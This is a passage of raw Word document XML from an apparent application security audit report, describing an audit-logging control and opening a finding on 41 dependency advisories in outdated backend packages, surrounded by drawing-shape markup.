        <w:t xml:space="preserve"> log channel with 90-day retention (shippable to a SIEM, and the copy that survives if the database is what was compromised). Its level is pinned to </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> independently of </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LOG_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LEVEL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because the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hardened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.example</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sets </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LOG_LEVEL=warning</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in production and would otherwise discard successful-login records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8C4B3E" w14:textId="0D5A4A66" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">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Failures are swallowed after being </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reported  a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> business operation must never fail because its audit row could not be written, or the audit system becomes a denial-of-service vector. Secrets are redacted at any nesting depth before writing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042F5DF9" w14:textId="77777777" w:rsidR="001244A6" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="101"/>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3456" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39BEAD36" wp14:editId="6307D65E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19319</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1162050" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27024" name="Group 27024"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1162050" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1162050" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2149" name="Shape 2149"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1162050" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1162050" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1152525" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1155155" y="0"/>
                                  <a:pt x="1157400" y="930"/>
                                  <a:pt x="1159260" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1161120" y="4638"/>
                                  <a:pt x="1162050" y="6896"/>
                                  <a:pt x="1162050" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1162050" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1162050" y="135967"/>
                                  <a:pt x="1161120" y="138212"/>
                                  <a:pt x="1159260" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1157400" y="141932"/>
                                  <a:pt x="1155155" y="142863"/>
                                  <a:pt x="1152525" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="133350"/>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D75AF8E" id="Group 27024" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.45pt;margin-top:-1.5pt;width:91.5pt;height:11.25pt;z-index:-251393024" coordsize="1162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vVgRgMAADoJAAAOAAAAZHJzL2Uyb0RvYy54bWykVl9vmzAQf5+074B4X8EQIImaVNq69mXa&#10;qrX7AI5jAhJgZDsh2aff+cBOSNJqavNAjO/f73539nF7t68rb8elKkWz8MlN6Hu8YWJdNpuF/+fl&#10;4cvU95SmzZpWouEL/8CVf7f8/Om2a+c8EoWo1lx64KRR865d+IXW7TwIFCt4TdWNaHkDwlzImmp4&#10;lZtgLWkH3usqiMIwDToh160UjCsFu/e90F+i/zznTP/Kc8W1Vy18wKbxKfG5Ms9geUvnG0nbomQD&#10;DPoOFDUtGwjqXN1TTb2tLC9c1SWTQolc3zBRByLPS8YxB8iGhGfZPEqxbTGXzbzbtI4moPaMp3e7&#10;ZT93j7J9bp8kMNG1G+AC30wu+1zW5h9Qenuk7OAo43vtMdgkJI3CBJhlICOTaJolPaesAOIvzFjx&#10;/W3DwIYNRmC6FtpDHRlQH2PguaAtR2LVHBh4kl65XvgRmcx8r6E19ClqeLiDxKCeo0nNFTD2QY5c&#10;qnTOtko/coFs090Ppfu2XNsVLeyK7Ru7lNDcb7Z1S7WxMzDN0utOylW4ahlxLXb8RaCiNjWbJVHi&#10;e7baAPSoUDWnioSA5pmu1WDbVcm+8r9n+glJTnwDNIwIjrJJCH0EQWfxcC6daBalvSjKsqnpL4A0&#10;dj9+s4YpIVFvOEljNDzGG/oW4qXTWdo3rbPre9pgMdldC2izvDQhcRzDieiNrNor+FwcEiezNDtD&#10;4dCTeBqRaCxNHCkEiMtQ+p+0HKkmEzKLzx27CpnznMZnYV29j6f9IqzNuifHddPIwupcYwYq0vfI&#10;JYJJam4bqMwl9CibWdGrhNioPbJB/VrBrimeNIMV2//en0Nw0qdW41qeLpmzlnf5jw6C49E219gl&#10;q4TifdeZ446HxF0BWKLjJVM15jaA9BmFoZtXVOP0qksN07gqa6A3ykI4j7aLwZu5g/trD1f6UHFz&#10;Y1TNb57D/YkTwmwouVl9q6S3o2bm4g+d06ot6LA7+B1UESr6MfZ5WVXOJUHTkcvv9w/RAx5YSGpQ&#10;NnYcx72zDHtLNqDpZz5MTkjaTn6wd0YYWTTa2TfwvYIwT7I1y5VYH3BaIiEwlJAaHNCYx/AxYb4A&#10;Tt9R6/jJs/wHAAD//wMAUEsDBBQABgAIAAAAIQB/Kup03QAAAAcBAAAPAAAAZHJzL2Rvd25yZXYu&#10;eG1sTI9Ba8JAEIXvhf6HZQq96SZKisZsRKTtSQrVQvG2ZsckmJ0N2TWJ/77jqd5m5j3efC9bj7YR&#10;PXa+dqQgnkYgkApnaioV/Bw+JgsQPmgyunGECm7oYZ0/P2U6NW6gb+z3oRQcQj7VCqoQ2lRKX1Ro&#10;tZ+6Fom1s+usDrx2pTSdHjjcNnIWRW/S6pr4Q6Vb3FZYXPZXq+Bz0MNmHr/3u8t5ezsekq/fXYxK&#10;vb6MmxWIgGP4N8Mdn9EhZ6aTu5LxolEwW7JRwWTOje7yIuHDiYdlAjLP5CN//gcAAP//AwBQSwEC&#10;LQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNd&#10;LnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8u&#10;cmVsc1BLAQItABQABgAIAAAAIQD74vVgRgMAADoJAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJv&#10;RG9jLnhtbFBLAQItABQABgAIAAAAIQB/Kup03QAAAAcBAAAPAAAAAAAAAAAAAAAAAKAFAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAqgYAAAAA&#10;">
                <v:shape id="Shape 2149" o:spid="_x0000_s1027" style="position:absolute;width:11620;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1162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KyAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oReim6UUmzqRqRQmvZS1B7s7ZF9bkKyb2N2q9Ff7wqCx2FmvmHmi9424kCdrxwrmIwT&#10;EMSF0xUbBb+bj9EMhA/IGhvHpOBEHhbZ4GGOqXZHXtFhHYyIEPYpKihDaFMpfVGSRT92LXH0dq6z&#10;GKLsjNQdHiPcNnKaJC/SYsVxocSW3ksq6vW/VfBnP/f+dP75Xn2ZJ2PDOd8X9Vapx2G/fAMRqA/3&#10;8K2dawXTyfMrXN/EJyCzCwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQD5/+SKyAAAAN0A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" path="m9525,l1152525,v2630,,4875,930,6735,2778c1161120,4638,1162050,6896,1162050,9525r,123825c1162050,135967,1161120,138212,1159260,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803l,133350,,9525,2790,2778c4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1162050,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/audit-logs</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (admin-only, read-only) makes the trail reviewable: recording the event satisfies half the control, detecting the incident needs the other half.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9CEC1E" w14:textId="77777777" w:rsidR="0011533D" w:rsidRPr="005C54CB" w:rsidRDefault="0011533D" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="101"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1503ABCE" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRPr="005C54CB" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">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V-12 · Vulnerable and outdated components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E2BA9A" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRPr="005C54CB" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">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A06:2021 · </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CWE-1104</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CWE-937</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High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1D8BB3" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRPr="005C54CB" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">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Backend — 41 advisories across 13 packages</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (12 high, 24 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>medium</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, 4 low): guzzle (9), psr7 (4), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>commonmark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (12), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/framework (3), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>symfony</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/mime, routing, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, mailer, process, http-foundation, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>polyfill-intl-idn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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phpunit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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psysh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31851F21" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRPr="005C54CB" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1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5504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A8BC614" wp14:editId="5F3AD677">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>456307</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19483</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1276350" cy="314325"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="28783" name="Group 28783"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1276350" cy="314325"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1276350" cy="314325"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1584" name="Shape 1584"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="228600" y="0"/>
                            <a:ext cx="1047750" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1047750" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1038225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1040855" y="0"/>
                                  <a:pt x="1043100" y="930"/>
                                  <a:pt x="1044960" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1046820" y="4638"/>
                                  <a:pt x="1047750" y="6890"/>
                                  <a:pt x="1047750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1047750" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1047750" y="135979"/>
                                  <a:pt x="1046820" y="138224"/>
                                  <a:pt x="1044960" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1043100" y="141945"/>
                                  <a:pt x="1040855" y="142875"/>
                                  <a:pt x="103822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593" name="Shape 1593"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="171450"/>
                            <a:ext cx="285750" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4651"/>
                                  <a:pt x="285750" y="6890"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="135973"/>
                                  <a:pt x="284820" y="138212"/>
                                  <a:pt x="282960" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="141932"/>
                                  <a:pt x="278855" y="142863"/>
                                  <a:pt x="276225" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138212"/>
                                  <a:pt x="0" y="135973"/>
                                  <a:pt x="0" y="133350"/>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705D0F97" id="Group 28783" o:spid="_x0000_s1026" style="position:absolute;margin-left:35.95pt;margin-top:-1.55pt;width:100.5pt;height:24.75pt;z-index:-251390976" coordsize="12763,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&#10;AADCE